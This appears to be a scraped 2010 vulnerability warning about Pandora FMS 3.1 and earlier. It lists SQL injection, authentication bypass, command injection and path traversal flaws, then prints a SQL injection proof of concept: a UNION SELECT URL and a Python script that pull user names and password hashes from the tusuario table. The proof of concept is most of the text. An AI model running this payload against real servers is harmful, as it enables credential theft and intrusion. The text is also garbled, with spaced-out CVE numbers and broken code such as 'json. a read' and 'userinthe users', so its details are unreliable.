Pandora FMS <=3.1 multiple vulnerabilities-vulnerability warning-the black bar safety net

2010-12-01T00:00:00
ID MYHACK58:62201028459
Type myhack58
Reporter 佚名
Modified 2010-12-01T00:00:00

Description

Pandora FMS is a server monitoring software, Pandora FMS <=version 3.1 there are multiple security vulnerabilities, including:directory traversal, SQL injection, system command injection, authentication bypass and other vulnerabilities. May lead to multiple security threats.

[+]info: ~~~~~~~~~ Pandora FMS < = 3.1 SQL Injection Pandora FMS <= 3.1 Authentication Bypass Pandora FMS <= 3.1 OS Command Injection Pandora FMS <= 3.1 Blind SQL Injection Pandora FMS < = 3.1 Path Traversal and LFI CVE-2 0 1 0-4 2 8 0 CVE-2 0 1 0-4 2 7 9 CVE-2 0 1 0-4 2 7 8 CVE-2 0 1 0-4 2 8 2

[+]poc: ~~~~~~~~~ SQLi: a http://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1//and//1=0//union//select//id_user,password//from/**/tusuario

view source

print?

| 0 1 | # Pandora Flexible Monitoring System SQL Injection PoC ---|---

0 2 | # Juan Galiana Lara ---|---

0 3 | # Gets the list of users and password from the database ---|---

0 4 | # ---|---

0 5 | #configure cookie&host before use it ---|---

0 6 | #usage ---|---

0 7 | #python sqlinj_users.py ---|---

0 8 | #admin:75b756ff2785ea8bb9ae02c13b6a71f1 ---|---

0 9 | #... ---|---

1 0 | ---|---

1 1 | import json ---|---

1 2 | import urllib2 ---|---

1 3 | ---|---

1 4 | headers={"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"} ` ---|---

1 5 | ---|---

1 6 | url="http://HOST/pandora_console/ajax.php"; ---|---

1 7 | url+= ---|---

1 8 | "? page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1" ---|---

1 9 | url+= ---|---

2 0 | "/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario" ---|---

2 1 | ---|---

2 2 | req=urllib2. Request(url,headers=headers) ` ---|---

2 3 | resp=urllib2. urlopen(req) ` ---|---

2 4 | ---|---

2 5 | users=json. a read(resp. read()) ` ---|---

2 6 | for userinthe users: ` ---|---

2 7 | print(user["id_agente"]+":"+user["nombre"]) ---|---

[1] [2] [3] [4] next